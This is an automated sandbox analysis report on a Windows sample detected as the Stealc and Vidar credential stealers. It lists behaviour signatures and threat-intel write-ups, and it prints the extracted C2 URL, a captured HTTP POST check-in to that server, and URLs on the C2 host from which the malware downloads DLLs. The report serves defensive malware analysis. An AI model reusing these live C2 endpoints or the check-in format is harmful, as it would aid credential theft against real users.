Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1524369
MD5:	ee7da1cb43d37f296cc5c5915dbbfdcb
SHA1:	368daff2e29e2b86579f1df6d61e9d444f3b0e3c
SHA256:	a01200a5fdda2e012ca18c8971dafe8097c371beebdbbcd94a4c75590857d303
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EE7DA1CB43D37F296CC5C5915DBBFDCB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1764315885.0000000004F30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7596	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7596	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7596	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.340000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T18:19:17.985578+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49737	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T18:19:17.979029+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49737	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T18:19:18.215036+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49737	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T18:19:19.258742+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49737	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T18:19:18.259071+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49737	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T18:19:17.742293+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49737	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T18:19:19.691496+0200	2803304	3	Unknown Traffic	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:26.153661+0200	2803304	3	Unknown Traffic	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:27.498395+0200	2803304	3	Unknown Traffic	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:27.969362+0200	2803304	3	Unknown Traffic	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:29.455718+0200	2803304	3	Unknown Traffic	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:31.735950+0200	2803304	3	Unknown Traffic	192.168.2.4	49737	185.215.113.37	80	TCP
2024-10-02T18:19:32.209961+0200	2803304	3	Unknown Traffic	192.168.2.4	49737	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 46 34 39 34 36 34 39 36 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="hwid"1AF4946496FB4109353171------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build"doma------IEHIIIJDAAAAAAKECBFB--

Source: file.exe, 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/#
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dlljE
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllXD
Source: file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll.D
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllJD
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dlltD
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllxE
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll$
Source: file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
Source: file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
Source: file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpBFt
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpM
Source: file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpP
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT
Source: file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpenSSH
Source: file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpnomi
Source: file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37OQIG
Source: file.exe, 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2015257049.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2014749931.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DBKKKEHDHCBFIEBFBGID.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	String found in binary or memory: https://support.mozilla.org
Source: JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000003.1836331325.000000001D57C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000003.1836331325.000000001D57C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
